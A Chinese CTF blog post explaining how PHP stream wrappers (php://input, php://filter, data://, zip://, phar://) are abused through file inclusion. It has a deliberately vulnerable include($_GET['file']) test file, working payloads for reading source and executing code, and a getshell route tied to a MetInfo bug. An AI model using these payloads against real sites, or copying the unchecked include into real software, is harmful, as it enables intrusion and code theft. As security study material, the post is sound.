分类 CTF 下的文章

PHP伪协议分析与应用

0x01 知识储备

php支持的协议和封装协议可以看http://php.net/manual/zh/wrappers.php,大致有12种,总结了一些真实漏洞和ctf比赛中常出现的案例,发现其中用的最多的四种是:php://、data://、zlib://、phar://

三个白帽
payload:php://filter/write=convert.base64-decode/resource=shell.php
bypass:死亡die,base64在解码时会忽略特殊字符

pctf2016
payload:data:text/plain;base64,MS50eHQ=
bypass:stripos等if判断

hctf2016+swpu2016
payload1+payload2
payload1:php://filter/convert.base64-encode/resource=../flag.php
payload2:phar://xxx.jpg/shell

西安华山杯2016
payload:php://input
payload:data:text/plain;base64,xxxx

0x02 相关研究

1)、php://
这里分析常用到的php://input和php://filter.其中php://input要求"allow_url_include"设置为"On"
写个测试文件test.php

<?php
include($_GET['file']);
?>

本地测试发现一个有趣的现象(本地1.php文件内容为phpinfo())

1、访问http://localhost:88/test.php?file=php://input
POST:php://filter/read=convert.base64-encode/resource=1.php
回显结果:php://filter/read=convert.base64-encode/resource=1.php
POST:<?php phpinfo();?>
回显结果:phpinfo()执行的结果

2、访问http://localhost:88/test.php?file=php://filter/read=convert.base64-encode/resource=1.php 
回显结果:PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=

3、访问http://localhost:88/test.php?file=php://filter//resource=1.php
回显结果:phpinfo()执行的结果

4、访问http://localhost:88/test.php?file=PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=(可以是其他任意字符,这里我只是想和第二种情况好比较)
回显结果:Warning: include(PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=): failed to open stream: No such file or directory in C:\phpStudy\WWW\test.php on line 2

为什么会出现四种不同的情况呢?我们可以把include()函数看成打开文件的file_get_contents()函数,当然又有所不同,include能解析php代码,重要的是两者共同的“流”的概念,这就解释了第四种include直接包含字符变量出现解析错误,因为没有“流”。。第一种有php://input流,相当于直接包含并尝试解析,如果能解析则解析,如果是变量,会不被解析直接回显,第二种有php://filter,可以看做经过过滤的流,读取1.php的内容,经过base64编码,然后include包含,可以看做include直接包含base64编码的变量,不被解析,直接回显,第三种相较于第二种,缺少了base64编码,include直接包含文件,读取该文件的内容并解析。

综上所述,就是“流”+“字符变量”,include不解析直接输出字符变量,“流”+“php代码”,include会解析执行,没有“流”则失败

2)、data://
这里分析常用到的data:text/plain,xxxxxxx、data:text/plain;base64,xxxxxxx

访问http://localhost:88/test.php?file=data:text/plain,<?php phpinfo();?>
执行phpinfo
访问http://localhost:88/test.php?file=data:text/plain,aaaaa
输出aaaaa
访问http://localhost:88/test.php?file=data:text/plain;base64,PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=
执行phpinfo
访问http://localhost:88/test.php?file=data:text/plain;base64,aaaaaa
输出aaaaaa base64解码后的内容

如果用file_get_contents函数做测试的话,大多都和include函数相同,不同的就是php代码不能解析,直接输出

3)、zlib://
有一种用法是:zip://archive.zip#dir/file.txt
找到一个真实漏洞:metinfo,版本大概是5.3.9
参见cheery师傅的博客,metinfo 最新代码执行一枚(8月30日)
漏洞成因:require_once $depth.'../include/captcha.class.php';变量$depth可控
利用方式为:构造文件目录结构为"../include/captcha.class.php",内含shell的文件,(在linux下才可构造,win下文件名不能含特殊字符),然后压缩为zip包,再把zip后缀改为png并上传
本地为了测试方便,修改为require_once $_GET['file'].'captcha.class.php';

访问`http://localhost:88/test.php?file=zip://C:/phpStudy/WWW/test.jpg%23`即可getshell

4)、phar://
这种和zip伪协议差不多,用法有一点点区别一个是“#”,一个是“/”
phar://archive.zip/dir/file.txt

同理访问http://localhost:88/test.php?file=phar://C:/phpStudy/WWW/test.jpg/即可getshell

0x03 应用场景

php://input和data://可以用来绕过一些判断语句
data://+include可以远程命令执行
php://filter可以用来对磁盘读写,ctf中任意文件读取用的比较多,还有就是三个白帽挑战中的绕过死亡die
zip://和phar://主要用于配合php://filter读源码审计上传拿getshell

参考

http://php.net/manual/zh/wrappers.php
https://github.com/L4oZu1/LFIboomCTF
http://www.cnblogs.com/LittleHann/p/3665062.html
http://lorexxar.cn/2016/09/14/php-wei/